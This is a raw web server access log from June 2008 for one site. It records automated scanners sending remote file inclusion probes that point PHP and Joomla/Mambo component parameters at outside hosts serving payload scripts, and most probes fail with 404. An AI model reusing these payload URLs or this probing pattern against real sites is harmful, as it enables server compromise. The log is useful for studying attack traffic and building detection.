89.108.91.166 - - [24/Jun/2008:10:02:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:02:17 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.159.55.66 - - [24/Jun/2008:10:03:05 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [24/Jun/2008:10:03:05 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [24/Jun/2008:10:03:05 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:03:08 -0700] "GET /logs/access_080211.log/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:03:14 -0700] "GET /logs/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:10:03:24 -0700] "GET /logs/access_080420.log//citywriter/head.php?path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:03:26 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:03:26 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:03:29 -0700] "GET /index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:03:41 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:03:45 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:03:45 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:03:45 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:04:07 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.80.245.220 - - [24/Jun/2008:10:04:16 -0700] "GET /logs/index.php?mf=http://nakash.file-il.com/rotest.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:17 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:19 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:19 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:20 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.80.245.220 - - [24/Jun/2008:10:04:27 -0700] "GET /index.php?mf=http://nakash.file-il.com/rotest.txt?? HTTP/1.1" 500 374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:34 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:35 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:35 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:04:35 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:04:40 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:04:48 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:05:09 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:05:18 -0700] "GET /logs/access_080326.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:05:19 -0700] "GET /logs/access_080326.log/avatar.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.245.146.189 - - [24/Jun/2008:10:05:28 -0700] "GET /logs/access_080106.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.146.189 - - [24/Jun/2008:10:05:35 -0700] "GET /logs/access_080127.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:05:48 -0700] "GET /logs/access_080213.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:05:48 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:05:49 -0700] "GET /logs/access_080212.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:06:07 -0700] "GET //popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:06:07 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:06:07 -0700] "GET /logs//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:32 -0700] "GET /logs/access_080211.log/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:33 -0700] "GET /!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:33 -0700] "GET /logs/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:33 -0700] "GET /logs/access_080103.log/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:38 -0700] "GET /logs/access_080211.log/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:38 -0700] "GET /logs/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:38 -0700] "GET /!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:10:06:39 -0700] "GET /logs/access_080103.log/!scanhttp://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
61.9.60.141 - - [24/Jun/2008:10:06:42 -0700] "GET /logs/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.60.141 - - [24/Jun/2008:10:06:47 -0700] "GET /index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 200 18391 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:06:54 -0700] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:06:58 -0700] "GET /logs/access_080211.log/index.php?nuseo_dir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:07:07 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:07:14 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:10:07:14 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:07:15 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:07:16 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:07:19 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:07:44 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:07:55 -0700] "GET /logs/access_080319.log//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:07:55 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:07:55 -0700] "GET //main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:07:55 -0700] "GET /logs//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:07:57 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.237.105.23 - - [24/Jun/2008:10:08:55 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:09:45 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:09:45 -0700] "GET //popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:09:45 -0700] "GET /logs//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:53 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:53 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:53 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:53 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:54 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:54 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:58 -0700] "GET /logs/access_080507.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:10:09:58 -0700] "GET /logs/access_080507.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.86.252 - - [24/Jun/2008:10:10:21 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:10:23 -0700] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:10:33 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:10:41 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:10:48 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:10:48 -0700] "GET /administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:10:48 -0700] "GET /logs/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:10:58 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:10:58 -0700] "GET //modules/My_eGallery/index.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:10:58 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:11:00 -0700] "GET /logs/access_071212.log//modules/My_eGallery/index.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:11:11 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:11:11 -0700] "GET /administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:11:11 -0700] "GET /logs/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:11:51 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:11:51 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:12:59 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:12:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:13:04 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:13:08 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:13:20 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:13:20 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:13:20 -0700] "GET /logs/access.log/index.php?url=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:13:23 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:13:24 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:13:25 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 500 374 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:13:29 -0700] "GET /logs/index.php?url=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:13:36 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:13:38 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:13:44 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 500 374 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:13:45 -0700] "GET /index.php?url=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:13:59 -0700] "GET /logs/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:14:02 -0700] "GET /logs/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:14:06 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:14:06 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 18389 "-" "libwww-perl/5.800" "www.dmulk.com"
